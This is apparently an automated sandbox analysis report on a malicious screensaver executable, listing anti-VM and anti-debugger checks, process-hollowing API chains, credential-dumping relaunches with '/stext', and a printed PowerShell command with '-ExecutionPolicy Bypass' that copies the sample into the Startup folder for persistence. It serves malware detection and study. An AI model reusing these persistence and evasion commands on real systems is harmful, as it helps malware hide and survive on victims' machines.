                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040E54F Sleep,ExitProcess,11_2_0040E54F
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_004198C2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3334Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4861Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1398Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeWindow / User API: threadDelayed 2062Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeWindow / User API: threadDelayed 7442Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_11-39856
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_11-39650
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeAPI coverage: 9.4 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 3334 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 311 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7800Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 4861 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 1398 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 1216Thread sleep count: 241 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 1216Thread sleep time: -120500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 6108Thread sleep count: 2062 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 6108Thread sleep time: -6186000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 6108Thread sleep count: 7442 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 6108Thread sleep time: -22326000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00407A8C FindFirstFileW,FindNextFileW,FindClose,11_2_00407A8C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00418C69 FindFirstFileW,11_2_00418C69
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B42F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00408DA7 FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 00000005.00000002.3341483838.000002A2EF055000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4126030463.0000000001564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: bhvA1B.tmp.13.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                  Source: .exe, 0000000B.00000002.4126030463.0000000001564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: svchost.exe, 00000005.00000002.3339716085.000002A2E9A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: bhvA1B.tmp.13.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeAPI call chain: ExitProcess graph end nodegraph_11-39899
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeAPI call chain: ExitProcess graph end nodegraph_16-33811
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004158B5 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004158B5
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10004AB4 mov eax, dword ptr fs:[00000030h]11_2_10004AB4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00442554 mov eax, dword ptr fs:[00000030h]11_2_00442554
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_1000724E GetProcessHeap,11_2_1000724E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_10002639
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10002B1C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00434168
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00433B44
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00433CD7 SetUnhandledExceptionFilter,11_2_00433CD7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043A65D
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.FAT6789098700900.scr.exe.290db7c.2.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                  Source: 0.2.FAT6789098700900.scr.exe.290db7c.2.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                  Source: 0.2.FAT6789098700900.scr.exe.290db7c.2.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00417245 CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_00417245
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00418754 mouse_event,11_2_00418754
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\FAT6789098700900.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess created: C:\Users\user\Desktop\FAT6789098700900.scr.exe "C:\Users\user\Desktop\FAT6789098700900.scr.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\yvbpfnx"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\apgagfhvldc"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" /stext "C:\Users\user\AppData\Local\Temp\lrtshyspzluife"Jump to behavior
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerGL
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG,
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\83 8-^
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.0000000001541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\PROC
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\>8?^
                  Source: .exe, 0000000B.00000002.4127179902.0000000004509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes }
